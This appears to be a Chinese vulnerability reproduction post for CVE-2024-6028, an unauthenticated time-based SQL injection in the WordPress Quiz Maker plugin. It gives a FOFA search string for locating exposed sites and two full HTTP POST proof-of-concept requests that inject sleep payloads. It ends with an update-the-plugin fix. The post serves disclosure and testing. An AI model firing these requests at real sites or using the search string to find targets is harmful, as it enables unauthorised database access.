01 漏洞名称
02 漏洞影响
Quiz Maker <= 6.5.8.3
03 漏洞描述
WordPress的Quiz Maker插件在6.5.8.3版本及以下存在基于时间的SQL注入漏洞,漏洞位于“ays_questions”参数上。由于对用户提供的参数缺乏足够的转义处理和对现有SQL查询的充分准备不足,使得未经验证的攻击者能够在已有的查询中附加额外的SQL查询,从而可能从数据库中提取敏感信息。
04 FOFA搜索语句
"/wp-content/plugins/quiz-maker/"
05
—
漏洞复现
POC数据包如下,睡眠5秒
POST
/wp-admin/admin-ajax.php
HTTP/1.1
Host
: x.x.x.x
User-Agent
: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection
: close
Content-Length
: 124
Content-Type
: application/x-www-form-urlencoded
Accept-Encoding
: gzip
ays_quiz_id=
1
&ays_quiz_questions=
1
,
2
,
3
&quiz_id=
1
&ays_questions[ays-question-
4
)+
or
+
sleep
(
if
(
1
>
0
,
5
,
0
)]=&action=ays_finish_quiz
睡眠10秒
POST
/wp-admin/admin-ajax.php
HTTP/1.1
Host
: x.x.x.x
User-Agent
: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection
: close
Content-Length
: 124
Content-Type
: application/x-www-form-urlencoded
Accept-Encoding
: gzip
ays_quiz_id=
1
&ays_quiz_questions=
1
,
2
,
3
&quiz_id=
1
&ays_questions[ays-question-
4
)+
or
+
sleep
(
if
(
1
>
0
,
10
,
0
)]=&action=ays_finish_quiz
漏洞复现成功
06
—
修复建议
建议您更新当前系统或软件至最新版,完成漏洞的修复。
原文始发于微信公众号(AI与网安):CVE-2024-6028 漏洞复现 POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论